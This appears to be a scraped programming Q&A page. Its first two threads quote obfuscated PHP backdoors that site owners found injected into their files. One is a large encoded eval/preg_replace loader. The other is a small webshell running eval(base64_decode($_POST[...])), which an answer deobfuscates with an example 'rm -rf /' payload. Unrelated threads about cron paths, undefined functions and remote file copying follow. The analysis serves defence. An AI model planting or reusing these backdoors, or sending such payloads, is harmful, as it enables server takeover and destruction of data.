We Keep Coding

Does somebody knows what is this code Virus in PHP? - php

I don't know what is, I found it inside of all PHP files on my server, I think is a kind of virus or something else?, What do you think guys?. Is already on my server, inside of each PHP file on the top of the document, and down of this code start my normal code.
I'll appreciate your help thanks!
<?php $jkpyncainc = 'ss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782g!>!#]y81]273]y76]258]%x5c%x7825yy)#}#-#%x5c%x787,*c%x5c%x7827,*b%x5cPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR_reporting(0); preg_replace("%x2f%50%x2e%52%x78:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%ftmbg}%x5c%x787f;!osvufs}wc%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x787f!~!<##!>!2p%29%57%x65","%x65%166%x61%154%x28%151ftmbg!osvufs!|ftmf!~<**9.-j%x5c5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K356]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%vodujpo)##-!#~<#%x5c%x72]y74]256#<!%x5c%x7825ff2!>!b!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]87822l:!}V;3q%x5c%x7825}U;x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gx5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<39275ttfsqnpdov{h19275j{hnpd19275fub}R;msv}.;%x5c%x782f#%x5c%x782-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7%x5c%x782f7###7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%87f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftm;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utp27!hmg%x5c%x7825)!gj!~<ofmy%x5c%x%x785cq%x5c%x7825%x5c%x78278y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#5t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww5c%x7824-%x5c%x7824*!|!%x56<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%xq%x5c%x7825<#g6R85,67R37,18R#>q%x5fV%x5c%x787f<*X&Z&S{ftm%x7825!<5h%x5c%x7825%x5c%x786]y81]265]y72]254]y76#<%x5c%x7825tmw!>mdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UV<#372]58y]472]37y]672]48y]#>s%x5c%x7825<%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvu#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:%x7827)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x7]88]5]48]32M3]317]445]212]445]43]32#00;quui#>.%x5c%x7825!<**yfeobz+sfwjidsb%x5c%x786R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2T7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5cx5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%xx7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825%x5c%x785c%x5c%x7825j:.2^,%x5ssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%xc%x7825b:<!%x5c%x782825>5h%x5c%x7825!<*::::::-111112)eobs%!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hI%x5c%x787fw6*%x5c%x787272qj%x5c%x7825)7gj6<**2qj%x5c%x782400~:<h%x5c%x7825_t%x5c%x7Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5x5c%x7822#)fepmqyfA>ovg}{;#)tutjyf%x5c%x7860opj86+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]27udovg)!gj!|!*msv%x5c%x7825)}k~~~<x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fwf14+9**-)1%x5c%x782f293]84]y31M6]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825%x7825hOh%x5c%x782f#00#W~!%x5c%x782%x5c%x7825%x5c%x7824-%x5c%if((function_exists("%x6f%142%x5f%163%x74%141%qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MP5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x785c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5d%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452g39*56A:>:8:|:7#6#)tutjyf%x5c%x786049386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%epn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c2f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782fj{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%5z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825EEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x78%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c24-%x5c%x7824-tusqpt)7fw6<*K)ftpmdXA6|7**197-2;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudx5c%x7825tww!>!%x5c%25h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:57860QUUI&b%x5c%x7825!|!*#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:**WYsboepn)%x5c%x7824%x78%62%x35%165%x3ac%x7825V<*#fopoV;hojepd<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]25G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55L-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gjoF.uofuopD#)sfebfI{*w%x5c%j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%xc%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%7825,3,j%x5c%x7825>j%x5c%x7825!<**3-d]55#*<%x5c%x7825bG9}:}.}-}!#*<%x8]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gd%x5c%x7825)uqpuft%x5c%x7860msvd},fV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785cf#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-i5kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggc%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5cW%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_S7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5mgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjy5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo2]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y74]2%x7825r%x5c%x7878Bsfuvso!sbo154%x69%164%50%x22%13%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pj%x5c%x7825-bubE{h%x5c%x786*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x786c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x782+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7888M4P8]37]278]225]241]3345c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>7]y72]265]y39]271]y83]256]y7%x5c%x7825!*3>?*2b%x5c%x297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51Lfs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmb2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%utRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+9)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Zw%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5x5c%x78257**^#zsfvr#%x5c%x785cq%x5cj%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5but%x5c%x7860cpV%x5c%x7I#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x82f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x56]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]25x5c%x78242178}527}88:}334}472%x5c%x7824552]e7y]#>n%x5c%x782560QUUI&c_UOFHB%x5c%x7860SFTV%x5c%xx7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%xx786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x*f%x5c%x7827,*e%x5c%x7827,*d%x5c%x782c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tv%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85]2!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y7gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u78256<C%x5c%x7827pd%x5x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%K9]77]D4]82]K6]72]K9]78]Kr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", %x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x51]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#0{6:!}7;!}6;##}C;!>>0bj+upcotn+qsvmt+fmhpph#)zbssb!-x5c%x7878pmpusut)tpqss5c%x7825nfd>%x5c%x7825fdy<Cb*#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h%x5c%x7827id%x5c%x78256<%)) { $GLOBALS["%x61%156%x75%156%x61"]=1; funj6<*id%x5c%x7825)ftp7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x56~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsy3d]51]y35]274]y4:]82]y3:vufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)us>:h%x5c%x7825:<#64y]Y%x5c%x7825)fnbozcYufhA%x5c%x78272q825)!gj!<2,*j%x5c%x7825-#1]825:osvufs:~:<*9-1-r%x5c%xc%x78b%x5c%x7825mm)%x5c%x7825%x5c%x78j%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257x7825)m%x5c%x7825):fmji%x5c%x7878:<##:7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5cc%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>25)sutcvt-#w#)ldbqov>*ofmy%xf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x5bss-%x5c%x7825r%x5c%x7878B%x5c%x78)!gj+{e%x5c%x7825!os%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]ction fjfgg($n){return chr(ord($n)-1);} #error<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%xy]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)y6g]273]y76]271]y7d]252]y74]256#<!%xx72%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"]))NULL); }x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA%x7825cB%x5c%x7825iN}#-!tussfw)%%x787fw6*3qj%x5c%x78257>%x5c%x782x7825!<12>j%x5c%x7825!|!*ctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!/(.*)/epreg_replacewpogvapkgq'; $tvgewvpmer = explode(chr((188-144)),'3644,46,9854,55,8686,44,9669,46,170,45,479,36,7686,60,256,63,5990,21,4650,20,6011,68,2509,40,6079,57,3860,56,5762,46,9350,70,7932,22,4956,52,9917,59,8846,47,8269,66,1517,44,7204,56,3747,48,4370,25,3690,57,2402,67,10008,33,2936,31,804,49,8994,35,9119,43,1345,49,7954,52,7031,35,4314,35,1594,27,940,48,2914,22,9258,53,1763,53,9200,58,5127,55,8730,20,1939,69,112,58,8661,25,3375,64,6162,65,8446,20,8790,56,345,43,5483,41,5182,34,1454,63,319,26,4395,52,3164,27,3342,33,515,31,9420,65,7066,61,1278,67,9029,27,6366,49,1561,33,5008,36,6136,26,9485,28,4828,70,674,44,10041,25,1230,48,8404,42,4163,64,458,21,2469,40,6590,24,5725,37,3144,20,6745,57,1873,28,4118,45,2284,25,7586,37,91,21,2195,54,2705,38,893,47,1162,68,2309,24,8466,32,3109,35,3261,41,8498,22,6886,59,4017,47,5688,37,4277,37,7437,34,4536,24,6945,49,9715,40,6440,63,8006,47,7528,58,6503,59,1024,29,5379,49,2048,47,6676,69,3981,36,988,36,5808,60,9513,37,6802,41,9585,20,8918,56,7181,23,1394,60,1850,23,5216,70,2333,69,1816,34,4670,23,4898,26,7471,57,779,25,9755,63,7876,56,5428,55,1053,58,7811,65,5911,51,7308,69,1901,38,7746,65,580,42,4447,20,2967,30,9056,26,718,61,1621,67,6265,65,9162,38,8974,20,7416,21,2008,40,4560,70,388,70,7377,39,4693,57,645,29,2632,53,1737,26,7623,63,10066,40,65,26,4349,21,3048,61,3618,26,6843,43,6330,36,5868,43,2743,65,7127,54,853,40,622,23,7260,48,1111,51,8893,25,5602,45,9976,32,5341,38,2808,42,2997,51,5962,28,4064,54,8610,51,2850,64,8078,42,3583,35,1688,49,4630,20,9550,35,4467,69,6614,62,3461,60,8053,25,546,34,2095,58,2153,42,3521,62,4750,40,5044,33,8520,29,8335,69,9605,64,6415,25,3916,65,2249,35,8202,67,0,43,3439,22,3191,70,5647,41,2549,54,4924,32,8750,40,2603,29,2685,20,3795,65,5568,34,9311,39,8162,40,6227,38,4227,50,6994,37,9082,37,215,41,8549,61,4790,38,5524,44,43,22,9818,36,3302,40,6562,28,5077,50,5286,55,8120,42,9909,8'); $bwellubqxl=substr($jkpyncainc,(42586-32480),(27-20)); if (!function_exists('mzrfqfsbfr')) { function mzrfqfsbfr($zsdakifiuq, $isfdnrujpz) { $wsvjrnzrfc = NULL; for($wzdtszvbpa=0;$wzdtszvbpa<(sizeof($zsdakifiuq)/2);$wzdtszvbpa++) { $wsvjrnzrfc .= substr($isfdnrujpz, $zsdakifiuq[($wzdtszvbpa*2)],$zsdakifiuq[($wzdtszvbpa*2)+1]); } return $wsvjrnzrfc; };} $vpzmduwprw="\x20\57\x2a\40\x67\156\x68\155\x62\156\x74\172\x6e\150\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\70\x36\55\x31\64\x39\51\x29\54\x20\143\x68\162\x28\50\x34\62\x39\55\x33\63\x37\51\x29\54\x20\155\x7a\162\x66\161\x66\163\x62\146\x72\50\x24\164\x76\147\x65\167\x76\160\x6d\145\x72\54\x24\152\x6b\160\x79\156\x63\141\x69\156\x63\51\x29\51\x3b\40\x2f\52\x20\161\x70\150\x78\152\x6f\153\x70\157\x64\40\x2a\57\x20"; $zhcvxtttqr=substr($jkpyncainc,(47797-37684),(67-55)); $zhcvxtttqr($bwellubqxl, $vpzmduwprw, NULL); $zhcvxtttqr=$vpzmduwprw; $zhcvxtttqr=(403-282); $jkpyncainc=$zhcvxtttqr-1; ?>

this is not the answer for your question, but since its the same issue I am having (https://stackoverflow.com/questions/24881340/malware-code-being-injected-in-my-php-scripts) (And I don't have the necessary reputation points to post a comment), here's a script to scan and remove all the php files: http://pastebin.com/JgyDZj3R
Make sure to change {username} to your accounts username, create a file named yoyo.txt on the same directory as this PHP script and paste the illegal code in that file.
Its best if you have SSH access since it will take a lot of time to execute depending on how many files you have.
Hope this helps! :)

If you have SSH access to the server, and the website isn't usually modified that much, I suggest you try the following:
Log in through SSH
Navigate to the website directory
Execute the command find . -mtime -1 -type f
This will give a list of all files which have been modified in the last day. This way you can manually check them and remove the malicious code blocks.
Should the exploit have been installed earlier, you can expand your search to go further back e.g. find . -mtime -3 -type f to go back 3 days.
Do note this is just a quick fix for a single website, chances are your server has been completely compromised, in which case you either need to do a full reinstall as already stated above, or get some professional help.

Related

I'm having an issue with PHP require (I think) and crontab. I'm using AWS.
The error looks like this:
PHP Fatal error: require(): Failed opening required '/inc/classes/core/inc.php' (include_path='.:/usr/share/pear:/usr/share/php') in /var/www/html/inc/files/core/config.php on line 16
My PHP require looks like this:
require($_SERVER['DOCUMENT_ROOT'].'/inc/files/core/config.php');
There are similar issues here about the same thing and I looked at them, but their solutions didn't seem to work for me. One of the things I tried from Stackoverflow was this:
$_SERVER['DOCUMENT_ROOT'] = realpath(dirname(__FILE__).'/../../../../');
require($_SERVER['DOCUMENT_ROOT'].'/inc/files/core/config.php');
Another was adding this to my php ini file (also a suggestion from another thread):
include_path = ".:/usr/share/php:/var/www/<directory>/"
I also tried being direct with the path (i.e., /var/www/public/inc/etc) which didn't work.
My file dictionary is like:
public
-- inc
---- files
------ site
-------- cron
-- etc
-- etc
I should note that the requires are the same on every page and they work, except in the cron job. I read that this could be because of the $_SERVER['DOCUMENT_ROOT'] var being set by the user as they browse and can't be set by the crontab, but I can't figure out the fix.
The crontab looks like this, but it seems to send an email every 5 minutes like it's supposed to so I don't think there's any issue here.
*/5 * * * * /usr/bin/php /var/www/html/inc/files/site/cron/shop.php
I'm hoping someone has some insight on this because I'm stumped! I didn't set up any of the crontab work but the person who did left, and I'm not familiar with it.
I put in all the information here I could think of, but I'm happy to answer any additional questions.

There is no $_SERVER when running php-cli. It will return empty or null value.
$_SERVER is an array containing information such as headers, paths, and script locations. The entries in this array are created by the web server.
https://secure.php.net/manual/en/reserved.variables.server.php
Replace with a path to the file you want, assuming the path of the script you are running. This may work, but maybe you need to add or remove some of the ../
require(__DIR__ . '/../../../files/core/config.php');
The error you get points to config.php file. You probably have another $_SERVER there, that you need to replace and/or find a way to identify whether is a HTTP request or php-cli.
Something like
if($_SERVER['DOCUMENT_ROOT']) {
require($_SERVER['DOCUMENT_ROOT'] . ...);
} else {
require(__DIR__. ...);
}
You may want to add a global constant that points to the root of you project.
if($_SERVER['DOCUMENT_ROOT']) {
const BASEDIR = $_SERVER['DOCUMENT_ROOT'];
} else {
const BASEDIR = __DIR__. ...;
}
Then use BASEDIR for the entire application.
EDIT: as suggested by #YvesLeBorg, you can create a different file, that call your entry point with curl or wget.
*/5 * * * * /usr/bin/php /path/to/my_script.sh
Then in my_script.sh you can write
wget http://my_web_page/shop.php
Then you will have a $_SERVER and there is no need to refactor.
Be aware of security, as anyone can call you page and run your proccess.
You may want to use a token and validate IP Address to be sure that only you can call this shop.php page.

Can any one explain this code. I am having this code on the top of almost every php file. What is this code for. Thanks for your help.
Here is the code....
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n642afe'])) {eval($s21(${$s20}['n642afe']));} ?>

I've seen that code a number of times in different incarnations. It's a piece of injected code left by an attacker. If you break it down it almost always results in eval($var); where $var is an injected parameter (usually $_POST) that then is used to perform some sort of malicious act on your server. Bear in mind eval() will execute any linux command with the same permissions and authority of the user running Apache/PHP.
Breaking down your example
In your example you've given the following code:
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n642afe'])) {eval($s21(${$s20}['n642afe']));} ?>
This is semi-obfuscated code but let's start to work through it. The first thing we need to do here is format it to start to understand it:
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);
if (isset(${$s20}['n642afe'])) {
eval($s21(${$s20}['n642afe']));
}
?>
We can see now that this is a relatively simple PHP script.
Line 1:
$sF="PCT4BA6ODSE_"; is just a variable with what seems like random rubbish in it.
Line 2:
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
This can be translated into: $s21 = "base64_decode"
Line 3:
$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);
As above, running strtoupper() on that string produces the result _POST.
Line 4:
The if statement here checks to see if ${s20}['n642afe'] is set. Well we know that $s20 evaluates to _POST and ${} type variables take the value as their variable name so this is really:
if(isset($_POST['n642afe'])){
Note: The n642afe part is a random parameter they've chosen so that you (or any other attacker!!!) tries to go to somefile.php?hack=yes it wouldn't work
Line 5:
The most dangerous part is here. Let's evaluate our variables in the same manner as above:
eval($s21(${$s20}['n642afe']));
The end result
eval(base64_decode($_POST['n642afe']));
If I were to send rm -rf / base64 encoded as post value for the parameter n642afe that would recursively delete everything. Unlikely it'd be able to do that without super user permissions but the point is - they'd have the same access rights as you do when you SSH to your server. Here's an example of what that'd look like:
http://example.com/infected.php?n642afe=cm0gLXJmIC8=
Translated, this becomes:
eval(base64_decode('cm0gLXJmIC8='));
And then again:
eval('rm -rf /');
My recommendation is - take the site offline immediately, update it, patch any
holes that are obvious and then make sure your server (and any other sites on there) are secure. Pay particular attention to file and folder permissions on your server. Note: this is a non-exhaustive list, there's so much more you can do to protect yourself.
If you simply delete this line you'll probably find one of two things will happen (or both):
The permissions on the "infected" file are different and the file is owned by a different user. You'll need to chmod/chown the file to get it back
The attackers will keep trying to get back in once they've been successful once. Simply removing the bad code is a good start but ask yourself this: "How did they get in in the first place?". With that in mind, please refer to my recommendation paragraph to begin to solve your issue.
Finding how they got in
To find where attackers 'got in' could be a game of cat and mouse, it's worth starting with the apache access logs though and searching for requests to your infected file with the parameter n642afe. You could also check your PHP logs to see what exactly was run and see what other holes they've opened.

I am looking at someones project and keep getting this line:
$resource_folder = getScenarioResourceFolder(getScenarioPath($scenario));
I cannot find any function that he implemented under those two names - getScenarioResourceFolder and getScenarioPath.
I started wandering that maybe the name Scenario has something to do with $scenario variable being in those functions. I know it might sound dumb, but I do not know what else to think.
Does anyone know about these function?

I know these:
You can search the function:
http://id1.php.net/manual-lookup.php?pattern=getScenarioPath if no
result, That is must be user-defined function.
You can check yourself by using
if (function_exists('getScenarioPath')) {
...
} else {
...
}

These are clearly custom functions that have been written in.
The simplest solution would be to GREP your entire system for getScenarioResourceFolder - you are looking for a .php file.
If you can't grep or don't know how, then it's time to go digging. Open any PHP files that are related to that project and look for getScenarioResourceFolder().
If you really don't have it, then you'll have to get in touch with the original architect of the project.

I have a script that displays images based on certain conditions. When none of the conditions are met, I want to randomly display one of the standard (backup) images. Those other images are on a remote server. I have read that you can't read a directory on a remote server, which makes sense.
Is my best bet to place a file into the remote server's image directory that outputs all of the image file names so I can parse it with the other server? Is there an easier way?
I prefer not to use FTP (http://php.net/manual/en/book.ftp.php).
What are my options for basically just getting the names of the images in that folder?
Thanks,
Ryan
UPDATE:
#mario's answer is lightweight and works like a charm. It is exactly the solution I thought I wanted, but after thinking about it some more, and reading that even #mario would do it differently, I decided to go with #bensiu's answer, because to me, control and security are more important than convenience. With #mario's method, it's very hard to know if the data you're getting is any good (lack of control) and you're exposing your directory / some server information (security). #bensiu's suggestion involves a second file (inconvenience), but provides the control and security I'm ultimately deciding to go with!
Thank you both!
-Ryan

I would prefer an exact and dedicated handler script like #bensiu pointed out.
But an alternative would be to read out a directory listing. A simple Apache generated mod_index listing would be sufficient for:
$html = file_get_contents("http://example.com/images/");
preg_match_all('/<a href="([-\w\d.]+\.(jpeg|png|gif))"/', $html, $uu);
$files = $uu[1];

I hope you at least have access to remote server...
You can place there script "A" that will do the job locally, return list of images in preffered format ( raw text, JSON, XML... ), and this script will be remotly called by curl form your server....
It also wise to make sure that when you call script "A" you at least passing some secret key to prevent unathorised access (not perfect solution but could be enought)

if you have PHP5 and the HTTP stream wrapper enabled on your server, it's very easy and simple to copy it to a local file:
copy('http://somedomain.com/file.jpeg', '/tmp/file.jpeg');
ome hosts disable copy() function then you can make your own -
<?php
function copyemz($file1,$file2){
$contentx =#file_get_contents($file1);
$openedfile = fopen($file2, "w");
fwrite($openedfile, $contentx);
